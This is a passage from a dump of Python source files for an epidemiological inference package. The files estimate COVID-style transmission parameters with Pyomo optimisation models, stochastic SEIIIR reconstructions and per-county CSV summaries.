T')\n plt.title('Comparison of daily transmissions')\n pdf.savefig()\n plt.close()\n \n ax = dfstoch_E.plot(color='silver', legend=False)\n dfsim_E[dfsim_E.index.isin(dfstoch_E.index)].plot(ax=ax, color='black', legend='Simulated E')\n plt.title('E comparison')\n pdf.savefig()\n plt.close()\n\n ax = dfstoch_I1.plot(color='silver', legend=False)\n dfsim_I1[dfsim_I1.index.isin(dfstoch_I1.index)].plot(ax=ax, color='black', legend='Simulated I1')\n plt.title('I1 comparison')\n pdf.savefig()\n plt.close()\n \n ax = dfstoch_I2.plot(color='silver', legend=False)\n dfsim_I2[dfsim_I2.index.isin(dfstoch_I2.index)].plot(ax=ax, color='black', legend='Simulated I2')\n plt.title('I2 comparison')\n pdf.savefig()\n plt.close()\n \n ax = dfstoch_I3.plot(color='silver', legend=False)\n dfsim_I3[dfsim_I3.index.isin(dfstoch_I3.index)].plot(ax=ax, color='black', legend='Simulated I3')\n plt.title('I3 comparison')\n pdf.savefig()\n plt.close()\n\n ax = dfstoch_R.plot(color='silver', legend=False)\n dfsim_R[dfsim_R.index.isin(dfstoch_R.index)].plot(ax=ax, color='black', legend='Simulated R')\n plt.title('R comparison')\n pdf.savefig()\n plt.close()\n\n #ax = dfstoch_T.cumsum().plot(color='silver', legend=False)\n #dfsim_R.plot(ax=ax, color='black', legend='Simulated R')\n #plt.title('R comparison')\n #pdf.savefig()\n #plt.close()\n\n return\n\nif __name__ == '__main__':\n #np.random.seed(1975)\n generate_simulation_figures(365, './figures/simulations.pdf')\n \n\n \n" }, { "alpha_fraction": 0.6953064799308777, "alphanum_fraction": 0.700435996055603, "avg_line_length": 44.33720779418945, "blob_id": "e595ab00da72d7f6417f843a543de980ad0b4df3", "content_id": "6d8aad9490084a1dc269c933ee9ead70bb8d93a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3899, "license_type": "no_license", "max_line_length": 143, "num_lines": 86, "path": "/epi_inference/formulations/decay_blike.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pandas as pd\nfrom datetime import datetime\nimport pyomo.environ as pe\nfrom pyomo.environ import SolverFactory, value\nfrom pyomo.opt import check_optimal_termination\nfrom .decay_lsq import create_inference_formulation_decay\n\n\n# ToDo: add datetime handling to pass in the dates associated with the data\ndef run_decay_blike(cm_rep_cases, population, sigma, gamma, report_delay, reporting_factor, analysis_window, Cdates, verbose=False):\n \"\"\"\n This function solves a likelihood inference formulation\n using the decay-based reconstruction function.\n\n Parameters\n ----------\n cm_rep_cases : list of *new* cases reported in each time period\n Note that this list is 1 entry longer than the transmissions, and \n it must start at zero (based on the assumptions in the reconstruction).\n population : the population of the node being considered\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma : float\n the rate constant for leaving the I compartment. This will be multiplied\n by 3 when applied to each of the three I compartments\n report_delay : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n reporting_factor : float\n The reporting factor (>1). If set to 5 this means 1 in 5 cases is reported\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n verbose : bool\n If true, then more output is printed to the console when the analysis is run\n \"\"\"\n assert sigma > 0\n assert gamma > 0\n assert report_delay > 0\n assert population > 0\n assert reporting_factor >= 1\n\n # initialize the likelihood model with results from the lsq model\n m = create_inference_formulation_decay(\n Cdates=Cdates,\n cumulative_reported_cases=cm_rep_cases,\n population=population, sigma=sigma,\n gamma_1=gamma*3, gamma_2=gamma*3, gamma_3=gamma*3,\n report_delay=report_delay, reporting_factor=reporting_factor,\n analysis_window=analysis_window,\n verbose=verbose,\n lse=True\n )\n \n # solve the least-squares problem\n solver = SolverFactory('ipopt')\n status = solver.solve(m, tee=verbose)\n \n # Check that the initialization solve completed successfully\n if check_optimal_termination(status) == False:\n return {'est_beta': None, 'status': 'failed', 'msg': 'Unknown solver error in least-squares initialization.'}\n\n # check that the beta value was successfully solved\n if m.beta.stale == True:\n return {'est_beta': None, 'status': 'failed', 'msg': 'Transmission parameter beta not solved (stale) in least-squares initialization.'}\n\n # deactivate the least-squares objective and activate the likelihood objective\n m.o_like.activate()\n m.o_lse.deactivate()\n\n # solve the likelihood formulation using initialization from the least-squares\n solver.options['tol']=1e-8\n status = solver.solve(m, tee=verbose)\n\n # Check that the solve completed successfully\n if check_optimal_termination(status) == False:\n return {'est_beta': None, 'status': 'failed', 'msg': 'Unknown solver error.', 'population':population}\n\n # check that the beta value was successfully solved\n if m.beta.stale == True:\n return {'est_beta': None, 'status': 'failed', 'msg': 'Transmission parameter beta not solved (stale).', 'population':population}\n\n return {'est_beta': value(m.beta),'status': 'ok', 'msg': 'Optimal solution found', 'population':population}\n" }, { "alpha_fraction": 0.5994125008583069, "alphanum_fraction": 0.6177712678909302, "avg_line_length": 39.348148345947266, "blob_id": "1b2efcf02f48c572f4e0d58c3b3f6a00eb2f9c25", "content_id": "e13f41698dd9877496fef8d41c273d1b6a38e58b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5447, "license_type": "no_license", "max_line_length": 175, "num_lines": 135, "path": "/epi_inference/formulations/attic/decay_multibeta_lsq.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pyomo.environ as pe\nfrom pyomo.environ import SolverFactory, value\nfrom pyomo.opt import assert_optimal_termination\nimport math\n\nfrom ..tseir_utils import compute_compartments_decay\n\n\ndef run_decay_multibeta_lsq(cm_rep_cases, population, sigma, gamma, deltaP, reporting_factor, verbose=False):\n print(\"WARNING: THIS MODEL IS NOT TESTED\")\n assert sigma > 0\n assert gamma > 0\n assert deltaP > 0\n assert population > 0\n assert reporting_factor >= 1\n\n m = create_inference_formulation_decay_multibeta(\n cumulative_reported_cases=cm_rep_cases,\n population=population, sigma=sigma,\n gamma_1=gamma*3, gamma_2=gamma*3, gamma_3=gamma*3,\n deltaP=deltaP, reporting_factor=reporting_factor,\n verbose=verbose,\n lse=True\n )\n\n solver = SolverFactory('ipopt')\n solver.options['tol']=1e-8\n status = solver.solve(m, tee=verbose)\n assert_optimal_termination(status)\n\n results = {}\n for i in m.beta:\n results['est_beta_week'+str(i)] = value(m.beta[i])\n return results\n\ndef create_inference_formulation_decay_multibeta(cumulative_reported_cases, population, sigma, gamma_1, gamma_2, gamma_3, deltaP, reporting_factor, verbose=False, lse=True):\n \"\"\"\n Creates a nonlinear one-step-ahead inference model using a decay model with 3 I compartments. The model is written in terms of absolute numbers of cases (not ln-transform)\n\n Parameters\n ----------\n cumulative_reported_cases : list of *new* cases reported in each time period\n population : the population of the node being considered\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma : float\n the rate constant for leaving the I compartment. This will be multiplied\n by 3 when applied to each of the three I compartments\n deltaP : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n reporting_factor : float\n The reporting factor (>1). If set to 5 this means 1 in 5 cases is reported\n\n \"\"\"\n cases, S, E, I1, I2, I3, R = compute_compartments_decay(cumulative_reported_cases=cumulative_reported_cases,\n population=population, sigma=sigma,\n gamma_1=gamma_1, gamma_2=gamma_2, gamma_3=gamma_3,\n deltaP=deltaP, reporting_factor=reporting_factor)\n assert(len(cumulative_reported_cases) == len(cases))\n\n if verbose:\n print('corrected case data being used:')\n print(cases)\n \n model = pe.ConcreteModel()\n\n # cache some parameters on the model to make\n # reporting easier\n model.N = population # overall population\n model.sigma = sigma\n model.gamma_1 = gamma_1\n model.gamma_2 = gamma_2\n model.gamma_3 = gamma_3\n model.deltaP = deltaP\n model.rep_fac = reporting_factor\n\n # define the set of times\n model.timesteps = [i for i in range(len(cases))]\n model.TIMES = pe.Set(initialize=model.timesteps, ordered=True)\n model.TIMES_m_one = pe.Set(initialize=model.timesteps[1:], ordered=True)\n\n numcases = len(cumulative_reported_cases)\n model.TIMES_beta = pe.Set(initialize=[i for i in range((numcases-1+6)//7)], ordered=True)\n model.beta_offset = 7*((numcases-1+6)//7) - numcases + 1\n model.beta = pe.Var(model.TIMES_beta, initialize=1.3, bounds=(0,None)) # transmission parameter\n ##model.alpha = pe.Var(initialize=1.0)\n ##model.alpha.fix(1.0)\n\n counter = [0]*((numcases-1+6)//7)\n\n #print(len(cases))\n #print(cases)\n #print(\"numcases\", numcases)\n #model.TIMES.pprint()\n #model.TIMES_beta.pprint()\n #print(\"offset\", model.beta_offset)\n\n # define the case count variables\n model.Chat = pe.Var(model.TIMES_m_one, initialize=1.0)\n\n # infection process\n def _infection_process(m, t):\n if t == m.TIMES.last():\n return pe.Constraint.Skip\n counter[(t+model.beta_offset)//7] = counter[(t+model.beta_offset)//7] + 1\n return m.Chat[t+1] == model.beta[(t+model.beta_offset)//7] * (I1[t] + I2[t] + I3[t]) * S[t] / m.N\n model.infection_process = pe.Constraint(model.TIMES, rule=_infection_process)\n\n if lse:\n # least squares objective function\n def _lse(m):\n return sum( (m.Chat[t] - cases[t])**2 for t in m.TIMES_m_one)\n model.o_lse = pe.Objective(rule=_lse)\n\n else:\n # likelihood objective function\n\n #\n # Alternate likelihood function\n #\n #def _like(m):\n #return sum( cases[t]/m.N*pe.log(1-pe.exp(-m.beta * (I1[t-1] + I2[t-1] + I3[t-1]) / m.N)) for t in m.TIMES_m_one if I1[t-1] + I2[t-1] + I3[t-1] > 0) + \\\n # sum( (S[t]-cases[t])/m.N*pe.log(pe.exp(-m.beta * (I1[t-1] + I2[t-1] + I3[t-1]) / m.N)) for t in m.TIMES_m_one)\n\n def _like(m):\n return sum( cases[t]/m.N*pe.log(1-pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / m.N)) for t in m.TIMES_m_one if I1[t] + I2[t] + I3[t] > 0) + \\\n sum( (S[t]-cases[t])/m.N*pe.log(pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / m.N)) for t in m.TIMES_m_one)\n model.o_like = pe.Objective(rule=_like, sense=pe.maximize)\n\n if verbose:\n print(counter)\n\n return model\n" }, { "alpha_fraction": 0.38509318232536316, "alphanum_fraction": 0.7577639818191528, "avg_line_length": 22, "blob_id": "31738b1afa2cc91a7c933fc8a4fcd5785c9bc0f3", "content_id": "a799ecf33f53e77ddba55637df5c9045a54968bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 161, "license_type": "no_license", "max_line_length": 62, "num_lines": 7, "path": "/examples/expdata/exp2/info.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "#\n# Experimental results generated for around_md seeded at 24031\n#\nbeta = 0.6944444444444444\nR0 = 2.7777777777777777\ngamma = 0.25\nsigma = 0.1923076923076923\n" }, { "alpha_fraction": 0.7874395847320557, "alphanum_fraction": 0.7922705411911011, "avg_line_length": 28.571428298950195, "blob_id": "404b5107b2805d059ab1ee241663c337d1f17b15", "content_id": "3d538ec4689a23aa7d59bdc143503f6ee5c938a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 207, "license_type": "no_license", "max_line_length": 42, "num_lines": 7, "path": "/epi_inference/reconstruction/__init__.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "# epi_inference.reconstruction\n\nfrom . import recon_deterministic_delay_wf\nfrom . import recon_stochastic_wf\nfrom . import recon_json2csv_wf\nfrom . import recon_summary_wf\nfrom . import recon_summary_old_wf\n" }, { "alpha_fraction": 0.573140025138855, "alphanum_fraction": 0.5876362919807434, "avg_line_length": 40.73500061035156, "blob_id": "d63d93790e38476b425234d638ab08a936325ebd", "content_id": "4ea2fa1dd126a7f4b2b9ceea2835dd19498d380b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8347, "license_type": "no_license", "max_line_length": 135, "num_lines": 200, "path": "/epi_inference/workflow/inference_json2csv_by_county_wf.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import sys\nimport os.path\ntry:\n import ujson as json\nexcept:\n import json\nimport csv\nimport glob\nimport pandas as pd\nimport numpy as np\n\nfrom epi_inference.engine.task import Task\nfrom epi_inference.engine.task_registry import register_task\n\ndef create_inference_csv_by_county(input_json_filespec, output_dir, low_inf_threshold, min_data_days_threshold):\n \"\"\"\n This function converts json files created by inference of the stochastic\n reconstruction data and produces csv files for each county\n \"\"\"\n if output_dir and not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n #\n # loop through all the json files and append the necessary fields\n # to a dataframe\n #\n json_filenames = list()\n for filename in glob.glob(input_json_filespec):\n if not os.path.exists(filename):\n raise RuntimeError(\"ERROR: Inference JSON file does not exist: \"+ filename)\n json_filenames.append(filename)\n json_filenames = sorted(json_filenames)\n\n counties_set = None\n county_dfs = dict()\n for j, jsonfname in enumerate(json_filenames):\n with open(jsonfname, 'r') as fd:\n d = json.load(fd)\n\n # this is not the best way to do this - we need to have the seed in the json output\n seed = jsonfname[:-5][-7:]\n try:\n test = int(seed)\n except:\n print('inference_json2csv_by_county currently only works with json'\n ' files produced with inference of stochastic reconstructions'\n ' since it needs the seed')\n raise\n \n print('... processing seed', seed, j, '/', len(json_filenames))\n\n # grab a list of counties the first time through\n # to check that each json has the same county list\n if counties_set is None:\n counties_set = set(d.keys())\n sorted_counties = sorted(counties_set)\n\n # check that all counties are included (and only those counties)\n assert sorted(d.keys()) == sorted_counties\n\n # build the county dictionaries for this seed\n for c in sorted_counties:\n dc = dict(d[c])\n dc['FIPS'] = [dc['FIPS']]*len(dc['date'])\n dc['window_days'] = [dc['window_days']]*len(dc['date'])\n dc['seed'] = [seed]*len(dc['date'])\n # change the name from beta to raw_est_beta\n dc['raw_est_beta'] = dc['beta']\n del dc['beta']\n # get the dates, changing the name from date to dates\n dc['dates'] = dc['date']\n del dc['date']\n\n # build the filtered data\n low_inf = list()\n low_data_days = list()\n filtered_est_beta = list()\n for i in range(len(dc['dates'])):\n inf = dc['infections_in_window'][i]\n data_days = dc['days_since_first_reported'][i]\n filtered_beta = dc['raw_est_beta'][i]\n if inf < low_inf_threshold:\n low_inf.append(True)\n filtered_beta = None\n else:\n low_inf.append(False)\n\n if data_days < min_data_days_threshold:\n low_data_days.append(True)\n filtered_beta = None\n else:\n low_data_days.append(False)\n\n filtered_est_beta.append(filtered_beta)\n dc['low_infections_in_window(<{})'.format(low_inf_threshold)] = low_inf\n dc['low_data_days(<{}days)'.format(min_data_days_threshold)] = low_data_days\n dc['filtered_est_beta'] = filtered_est_beta\n\n dfc = pd.DataFrame(dc)\n dfc.fillna(value=np.nan, inplace=True)\n if c not in county_dfs:\n county_dfs[c] = dict()\n\n county_dfs[c][seed] = dfc\n\n\n description_file = os.path.join(output_dir, 'inference_description.txt')\n fd = open(description_file, 'w')\n \n for i,c in enumerate(sorted_counties):\n print('... processing county', c, i, '/', len(sorted_counties))\n\n # concatenate across all the seeds\n county_df = pd.concat(county_dfs[c].values())\n\n print('County:', c)\n description_str = county_df.describe(include=None, exclude=[list])\n fd.write(description_str.to_string())\n fd.write('\\n')\n\n fname = os.path.join(output_dir, 'estimated_beta_county_{}.csv'.format(c))\n county_df.to_csv(fname, quoting=csv.QUOTE_NONNUMERIC, index=False)\n\n # get the status across the seeds\n q05_raw = county_df.groupby('dates')['raw_est_beta'].quantile(.05)\n q05_raw.rename('q05_raw_est_beta', inplace=True)\n q25_raw = county_df.groupby('dates')['raw_est_beta'].quantile(.25)\n q25_raw.rename('q25_raw_est_beta', inplace=True)\n q50_raw = county_df.groupby('dates')['raw_est_beta'].quantile(.50)\n q50_raw.rename('q50_raw_est_beta', inplace=True)\n qmean_raw = county_df.groupby('dates')['raw_est_beta'].mean()\n qmean_raw.rename('qmean_raw_est_beta', inplace=True)\n q75_raw = county_df.groupby('dates')['raw_est_beta'].quantile(.75)\n q75_raw.rename('q75_raw_est_beta', inplace=True)\n q95_raw = county_df.groupby('dates')['raw_est_beta'].quantile(.95)\n q95_raw.rename('q95_raw_est_beta', inplace=True)\n\n q05_filtered = county_df.groupby('dates')['filtered_est_beta'].quantile(.05)\n q05_filtered.rename('q05_filtered_est_beta', inplace=True)\n q25_filtered = county_df.groupby('dates')['filtered_est_beta'].quantile(.25)\n q25_filtered.rename('q25_filtered_est_beta', inplace=True)\n q50_filtered = county_df.groupby('dates')['filtered_est_beta'].quantile(.50)\n q50_filtered.rename('q50_filtered_est_beta', inplace=True)\n qmean_filtered = county_df.groupby('dates')['filtered_est_beta'].mean()\n qmean_filtered.rename('qmean_filtered_est_beta', inplace=True)\n q75_filtered = county_df.groupby('dates')['filtered_est_beta'].quantile(.75)\n q75_filtered.rename('q75_filtered_est_beta', inplace=True)\n q95_filtered = county_df.groupby('dates')['filtered_est_beta'].quantile(.95)\n q95_filtered.rename('q95_filtered_est_beta', inplace=True)\n\n county_df_summary = pd.concat([q05_filtered, q25_filtered,\n q50_filtered, q75_filtered,\n q95_filtered, qmean_filtered,\n q05_raw, q25_raw,\n q50_raw, q75_raw,\n q95_raw, qmean_raw],\n axis=1)\n county_df_summary = county_df_summary.reset_index()\n\n fname = os.path.join(output_dir, 'summary_estimated_beta_county_{}.csv'.format(c))\n county_df_summary.to_csv(fname, quoting=csv.QUOTE_NONNUMERIC, index=False)\n\n fd.close()\n\n\nclass Inference_JSON2CSV_By_County_Workflow(Task):\n def __init__(self):\n Task.__init__(self, \"inference_json2csv_by_county\",\n \"Create a CSV file of inference results for each county.\")\n\n def validate(self, CONFIG):\n valid_options = set(['input_json', 'output_dir', 'low_infection_threshold', 'factors', 'factor_levels', 'workflow', 'verbose'])\n for key in CONFIG:\n if key not in valid_options:\n raise RuntimeError(\"Unexpected configuration option: '%s'\" % key)\n\n def run(self, data, CONFIG):\n pd.set_option('display.max_columns', None)\n pd.set_option('display.width', 1000)\n self._warnings = []\n self.validate(CONFIG)\n create_inference_csv_by_county(\n input_json_filespec=CONFIG['input_json'],\n output_dir=CONFIG.get('output_dir', None),\n low_inf_threshold=int(CONFIG.get('low_infection_threshold', 0)),\n min_data_days_threshold=int(CONFIG.get('min_data_days_threshold', 14))\n )\n\nregister_task(Inference_JSON2CSV_By_County_Workflow())\n\nif __name__ == '__main__':\n json_filespec = sys.argv[1]\n output_dir = './json2csv-test-results'\n low_infection_threshold = 100\n create_inference_csv_by_county(\n input_json_filespec=json_filespec,\n output_dir=output_dir,\n low_inf_threshold=low_infection_threshold,\n min_data_days_threshold=14\n )\n" }, { "alpha_fraction": 0.6295040249824524, "alphanum_fraction": 0.6425038576126099, "avg_line_length": 50.28260803222656, "blob_id": "d826cab86b101603400eb9254b5e8d947c95b850", "content_id": "e10fafb8a8ab25366b72862f498a0ded944dc908", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21231, "license_type": "no_license", "max_line_length": 154, "num_lines": 414, "path": "/epi_inference/reconstruction/stochastic.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pandas as pd\nfrom datetime import datetime, timedelta\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\nimport math\nfrom pyutilib.misc.misc import Bunch\n\ndef stochastic_reconstruction(*, dates, reported_cases_per_day, population, n_steps_per_day,\n reporting_delay_mean=8, reporting_delay_dev=1.35,\n reporting_multiplier=10,\n fixed_incubation=5.2,\n infectious_lower=2.6, infectious_upper=6, seed=0):\n \"\"\"\n This function computes a reconstruction of the SEIIIR compartments based on the reported cases.\n 1. for each day, the actual number of cases is sampled from an inverse binomial using the reported\n cases and the reporting_multiplier\n 2. for each case, we sample the reporting_delay using a log-normal with the reporting_delay_mean and\n reporting_delay_dev - this produces the vector of transmissions in time\n 3. The transmissions in time cause movement from S->E, and then a discrete-time SEIIIR model is used\n to populate the compartments.\n\n Parameters\n ----------\n dates : list\n list of datetime objects corresponding to the dates of the reported_cases_per_day\n reported_cases_per_day : list\n list of the reported cases per day\n population : float\n population of this node (county)\n n_steps_per_day : int\n the number of timesteps to take in one day (e.g., value of 4 means the delta_t = 0.25 days)\n reporting_delay_mean : float\n reporting delay is drawn from a log normal\n d=np.random.lognormal(np.log(reporting_delay_mean), sigma=np.log(reporting_delay_dev))\n Note: If reporting_delay_dev is set to None, then the reporting delay is fixed to the value of\n reporting_delay_mean and not sampled.\n reporting_delay_dev : float\n reporting delay is drawn from a log normal\n d=np.random.lognormal(np.log(reporting_delay_mean), sigma=np.log(reporting_delay_dev))\n Note: If this is set to None, then the reporting delay is fixed to the value of reporting_delay_mean\n and not sampled.\n reporting_multiplier : int\n the number of actual cases per reported case (i.e., reporting fraction is 1/reporting_multiplier)\n fixed_incubation : float\n the incubation period in days\n infectious_lower : float\n the infectious period is drawn from a uniform distribution between infectious_lower and infectious_upper\n infectious_upper : float\n the infectious period is drawn from a uniform distribution between infectious_lower and infectious_upper\n seed: int\n the seed for the random number generator\n\n Returns\n -------\n dict : a dict of the dates and the compartments\n \"\"\"\n if seed:\n np.random.seed(seed)\n\n n_r_days = len(dates)\n\n # create a vector of the infections in time (when the infection occurred - S->E)\n # this is called T (transmissions) in the code -> see tdates, tcases\n # this needs to be padded at the front with days prior to the reporting dates\n # and converted to timesteps that includes \"steps per day\"\n assert type(n_steps_per_day) is int\n assert n_steps_per_day >= 1\n padding_days = 50 # days - maybe this should be passed in?\n padding_timesteps = padding_days*n_steps_per_day\n tcases_timestep = [0]*(n_r_days+padding_days)*n_steps_per_day\n\n # probability of confirmation of case - reporting fraction\n # this should be drawn from a distribution as well if good data exists\n p = 1 / reporting_multiplier\n\n # loop through each day and draw the total number of cases that day\n # from the reported cases and the reporting fraction\n # These are the total number of cases that could be reportable\n for r_day in range(len(dates)):\n r_timestep = r_day*n_steps_per_day\n if reported_cases_per_day[r_day] > 0:\n # draw the total number of reportable cases\n reportable_cases_day = int(reported_cases_per_day[r_day] + np.random.negative_binomial(reported_cases_per_day[r_day],p))\n\n if reportable_cases_day > 0:\n # now draw the delays from infection to confirmation (log normal)\n # one delay is drawn for each reportable case and is in units of days\n if reporting_delay_dev is None:\n # used for testing against simulated data\n delays_days = [reporting_delay_mean]*reportable_cases_day\n delays_days = [d*n_steps_per_day for d in delays_days]\n else:\n delays_days = np.random.lognormal(mean=np.log(reporting_delay_mean), sigma=np.log(reporting_delay_dev), size=reportable_cases_day)\n # convert this to timesteps\n assert type(delays_days) is np.ndarray\n delays_days = delays_days*n_steps_per_day\n delays_timesteps = np.round(delays_days).astype(int)\n # add one transmission (infection) based on each reportable case and its delay\n for delay_timestep in delays_timesteps:\n if r_timestep - delay_timestep + padding_timesteps >= 0:\n tcases_timestep[r_timestep - delay_timestep + padding_timesteps] += 1\n\n # truncate some days off of the transmissions\n # since we don't yet have the reported cases to estimate this appropriately\n int_delay = int(np.round(1.64*reporting_delay_mean))\n t_daily_dates = [dates[0] + timedelta(days=i) for i in range(-padding_days, n_r_days - int_delay)]\n tcases_timestep = tcases_timestep[: -int_delay * n_steps_per_day]\n\n # capture the reported cases per day - add the padding and truncate the end\n output_reported_cases = [0]*padding_days\n output_reported_cases.extend(reported_cases_per_day[: -int_delay])\n\n # use these transmissions to generate a single stochastic reconstruction\n # of each of the compartments (SEIIIR)\n S = np.zeros(len(tcases_timestep))\n S[0] = population\n E = np.zeros(len(tcases_timestep))\n I1 = np.zeros(len(tcases_timestep))\n I2 = np.zeros(len(tcases_timestep))\n I3 = np.zeros(len(tcases_timestep))\n R = np.zeros(len(tcases_timestep))\n\n # Approach 1:\n # - sigma is fixed at 1/5.2 days\n # - serial interval is drawn from uniform 6.5-8.2, and used\n # to compute gamma\n # It might be better to just draw sigma and gamma from separate\n # distributions here.\n # Here, the serial interval is drawn once and that value is used\n # for the entire simulation, however, it could be drawn for each day\n # as well.\n # Note: These are drawn for every day, but they are the same for each day\n # - this is done so the code is ready for different values on each day if\n # we decide to do that.\n sigma = 1.0/fixed_incubation*np.ones(len(tcases_timestep)) # days\n infectious_period = np.random.uniform(infectious_lower, infectious_upper)*np.ones(len(tcases_timestep)) # CDL , size=len(tcases_timestep))\n gamma = np.reciprocal(infectious_period)\n #incubation = np.random.exponential(scale=mean_incubation, size=len(tcases))\n # CDL serial_interval = np.random.uniform(6.35, 8.05)*np.ones(len(tcases_timestep))\n #serial_interval = np.random.uniform(6.5, 8.2)*np.ones(len(tcases_timestep))\n # compute gamma = 1/ ( 2*(SI-1/sigma) )\n #temp = np.copy(sigma)\n #np.reciprocal(temp, out=temp)\n #temp = 2*(serial_interval-temp)\n #gamma = np.reciprocal(temp)\n \n prob_E = 1-np.exp(-1.0/n_steps_per_day*sigma)\n prob_III = 1-np.exp(-1.0/n_steps_per_day*3*gamma)\n\n # loop through all of the days and compute the compartments\n # with the stochastic simulations\n for t in range(len(tcases_timestep)-1):\n Stout = tcases_timestep[t]\n if Stout >= S[t]:\n # reconstruction indicates the number of infections\n # exceed the population - flag this for error reporting\n # means the reported cases or reporting factor are too large\n # for the population value specified\n # Todo: flag a warning\n Stout = S[t]\n \n S[t+1] = S[t] - Stout\n Etout = np.random.binomial(E[t], prob_E[t])\n E[t+1] = E[t] + Stout - Etout\n I1tout = np.random.binomial(I1[t], prob_III[t])\n I1[t+1] = I1[t] + Etout - I1tout\n I2tout = np.random.binomial(I2[t], prob_III[t])\n I2[t+1] = I2[t] + I1tout - I2tout\n I3tout = np.random.binomial(I3[t], prob_III[t])\n I3[t+1] = I3[t] + I2tout - I3tout\n R[t+1] = R[t] + I3tout\n\n # now bring these vectors back to days\n S = [S[t] for t in range(len(S)) if t % n_steps_per_day == 0]\n E = [E[t] for t in range(len(E)) if t % n_steps_per_day == 0]\n I1 = [I1[t] for t in range(len(I1)) if t % n_steps_per_day == 0]\n I2 = [I2[t] for t in range(len(I2)) if t % n_steps_per_day == 0]\n I3 = [I3[t] for t in range(len(I3)) if t % n_steps_per_day == 0]\n R = [R[t] for t in range(len(R)) if t % n_steps_per_day == 0]\n T = [None]*len(S)\n for day_idx in range(len(T)):\n T[day_idx] = 0\n for t in range(n_steps_per_day):\n T[day_idx] += tcases_timestep[t+day_idx*n_steps_per_day]\n assert len(t_daily_dates) == len(T)\n assert len(t_daily_dates) == len(S)\n # return the output\n # - rdates, rcases: reported cases and their dates\n # (new reported cases each day - not cumulative)\n # - tdates: dates for all the other compartments\n # - tcases: transmissions (reportable cases at the time\n # of the initial transmission\n # - S,E,I1,I2,I3,R: numbers of individuals in each of the\n # compartments on the dates in tdates\n return Bunch(dates=t_daily_dates, S=S, E=E, I1=I1, I2=I2, I3=I3, R=R, transmissions=T, orig_rep_cases=output_reported_cases)\n\ndef np_stochastic_reconstruction(*, dates,\n reported_cases_per_day,\n counties,\n populations,\n n_steps_per_day,\n reporting_delay_mean=8, reporting_delay_dev=1.35,\n reporting_multiplier=10,\n fixed_incubation=5.2,\n infectious_lower=2.6, infectious_upper=6):\n \"\"\"\n This function computes a reconstruction of the SEIIIR compartments based on the reported cases.\n 1. for each day, the actual number of cases is sampled from an inverse binomial using the reported\n cases and the reporting_multiplier\n 2. for each case, we sample the reporting_delay using a log-normal with the reporting_delay_mean and\n reporting_delay_dev - this produces the vector of transmissions in time\n 3. The transmissions in time cause movement from S->E, and then a discrete-time SEIIIR model is used\n to populate the compartments.\n\n Parameters\n ----------\n dates : numpy array of datetime objects\n The dates corresponding to the rows in the cumulative reported cases\n counties : numpy array of object (strings)\n The names of the counties (or nodes) corresponding to the columns in the\n cumulative reported cases\n reported_cases_per_day : Numpy two-dimensional array\n This is a numpy array that contains the reported cases per day. Each row\n corresponds to a different day, and each column is a different county (node).\n populations : numpy array of populations\n This is an array of populations. Each entry corresponds to one of the counties\n n_steps_per_day : int\n the number of timesteps to take in one day (e.g., value of 4 means the delta_t = 0.25 days)\n reporting_delay_mean : float\n reporting delay is drawn from a log normal\n d=np.random.lognormal(np.log(reporting_delay_mean), sigma=np.log(reporting_delay_dev))\n Note: If reporting_delay_dev is set to None, then the reporting delay is fixed to the value of\n reporting_delay_mean and not sampled.\n reporting_delay_dev : float\n reporting delay is drawn from a log normal\n d=np.random.lognormal(np.log(reporting_delay_mean), sigma=np.log(reporting_delay_dev))\n Note: If this is set to None, then the reporting delay is fixed to the value of reporting_delay_mean\n and not sampled.\n reporting_multiplier : int\n the number of actual cases per reported case (i.e., reporting fraction is 1/reporting_multiplier)\n fixed_incubation : float\n the incubation period in days\n infectious_lower : float\n the infectious period is drawn from a uniform distribution between infectious_lower and infectious_upper\n infectious_upper : float\n the infectious period is drawn from a uniform distribution between infectious_lower and infectious_upper\n\n Returns\n -------\n Bunch : (like a dict with keys: dates, S, E, I1, I2, I3, R, transmissions)\n dates: dates corresponding to the states in the model\n S: numpy array of susceptible population values\n E: numpy array of exposed population values\n I1, I2, I3: numpy arrays of infective counts in I1, I2, and I3 compartments respectively\n R: numpy array of recovered population values\n transmissions: numpy array of transmissions (from S->E) \n \"\"\"\n # check the types\n assert isinstance(dates, np.ndarray) and dates.dtype == np.object\n assert isinstance(counties, np.ndarray) and counties.dtype == np.object\n assert isinstance(reported_cases_per_day, np.ndarray) and reported_cases_per_day.dtype == np.float\n \n n_r_days = len(dates)\n n_counties = len(counties)\n assert reported_cases_per_day.shape[0] == n_r_days\n assert reported_cases_per_day.shape[1] == n_counties\n assert np.all(populations > 0)\n\n # create an array of the infections in time (when the infection occurred - S->E)\n # this is called tcases (transmissions) in the code\n # the tcases array needs to be padded at the front with days prior to the reporting dates\n # and converted to timesteps that includes \"steps per day\"\n assert type(n_steps_per_day) is int\n assert n_steps_per_day >= 1\n padding_days = 30 # days - maybe this should be passed in?\n padding_timesteps = padding_days*n_steps_per_day\n n_r_daily_dates = len(dates) # number of days of 